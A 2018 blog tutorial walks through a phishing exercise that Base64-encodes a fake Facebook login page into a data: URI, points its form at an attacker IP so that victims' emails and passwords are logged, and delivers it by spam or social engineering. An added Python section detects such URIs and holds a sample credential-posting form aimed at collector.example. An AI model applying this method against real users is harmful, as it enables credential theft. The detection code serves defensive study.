
Monday, April 2, 2018

Phishing (II) - Data URIs scheme with Base64 encoding



- Layout for this exercise:




- This exercise is based on the previous one:

http://www.whitelist1.com/2018/04/phishing-i-local-redirection-and-remote.html


- The goal of this exercise is to launch a page-less phishing attack, meaning that there is no need to host an HTML file on a server.

- The phishing bait will be embedded in a URI, using the Data URIs scheme.



1 - Redirecting user input to the attacker machine

- On the attacker machine (Windows 10), let's open the index.html file inside xampp > htdocs using Notepad:




- Find action= and replace the line with the string below, where 192.168.1.6 is the IP address of the Windows 10 attacker machine:



- In this way, any user input entered in a connection to the fake web page will be redirected to the file mail.php, where the credentials will be harvested.


2 - Encoding index.html with Base64

- Base64 is a group of similar binary-to-text encoding schemes that represent binary data in an ASCII string format by translating it into a radix-64 representation.

- Each Base64 digit represents exactly 6 bits of data, so three bytes (24 bits) can be represented by four 6-bit Base64 digits:

https://en.wikipedia.org/wiki/Base64


- Now, using the Base64 encoding scheme, let's encode the whole index.html page, for instance with the tool offered by this website:

https://www.base64encode.org/




- These encoded characters must be copied and stored for further use.

- Finally, before launching the attack let's remove index.html from xampp > htdocs, because this will be a page-less phishing attack:





3 - Data URIs scheme

- The data URI scheme is a Uniform Resource Identifier (URI) scheme that provides a way to include data in-line in web pages as if they were external resources:

https://en.wikipedia.org/wiki/Data_URI_scheme


- This technique allows normally separate elements such as images and style sheets to be fetched in a single Hypertext Transfer Protocol (HTTP) request, which may be more efficient than multiple HTTP requests.

- In other words, small files can be incorporated inline into documents.

- The syntax of the data URI scheme using Base64 is composed of four parts:

data: <mediatype> ; <base64> , <data>


- In our case let's prepend data:text/html;base64, to the encoded index.html:

data:text/html;base64,PCFET0....

1) data: <- prefix for the scheme
2) text/html <- MIME data type
3) ;base64 <- Base64 encoding is in use
4) ,PCFET0.... <- index.html encoded with Base64
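
A defender-side check for the data URI format described above, as an added example that is not part of the original post: it parses the four parts of every data URI found in a piece of text (a mail body, a proxy log line), decodes the payload, and reports HTML payloads that contain a password form together with the form's action target. The names `scan` and `FormFinder` and the sample host `collector.example` are assumptions made for this illustration.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import unquote_to_bytes

# data:[<mediatype>][;base64],<data>  (the four parts listed above)
DATA_URI = re.compile(
    r"data:(?P<mime>[\w.+-]+/[\w.+-]+)?(?P<params>(?:;[\w-]+=[\w.-]+)*)"
    r"(?P<b64>;base64)?,(?P<data>[A-Za-z0-9+/=%._~-]*)", re.IGNORECASE)


class FormFinder(HTMLParser):
    """Collects form actions and notes whether a password field exists."""
    def __init__(self):
        super().__init__()
        self.actions, self.has_password = [], False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password = True


def scan(text):
    """Return one finding per HTML data URI in text that carries a login form."""
    findings = []
    for m in DATA_URI.finditer(text):
        if (m["mime"] or "text/plain").lower() != "text/html":
            continue  # images, style sheets, etc. are the legitimate use
        raw = m["data"]
        try:
            # Re-pad Base64 that was truncated of its '=' characters.
            body = (base64.b64decode(raw + "=" * (-len(raw) % 4))
                    if m["b64"] else unquote_to_bytes(raw))
        except ValueError:
            continue  # malformed payload, nothing to inspect
        finder = FormFinder()
        finder.feed(body.decode("utf-8", errors="replace"))
        if finder.has_password:
            findings.append({"offset": m.start(), "actions": finder.actions})
    return findings


# Constructed sample: a mail body with one HTML data URI and one image data URI.
SAMPLE_HTML = (b'<form action="http://collector.example/mail.php" method="post">'
               b'<input name="email"><input type="password" name="pass"></form>')
SAMPLE = ("Please log in: data:text/html;base64," + base64.b64encode(SAMPLE_HTML).decode()
          + " logo: data:image/png;base64,iVBORw0KGgo=")
```

Running `scan(SAMPLE)` reports only the `text/html` URI; the image URI is skipped because its media type is not HTML.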






4 - Launching the attack

- Now, when the victim enters the data URI into the browser (it could be provided by spam email or social engineering), a fake Facebook home page is presented.

- Entering credentials:




- Immediately a log.txt is created at the attacker side, where email and password are harvested: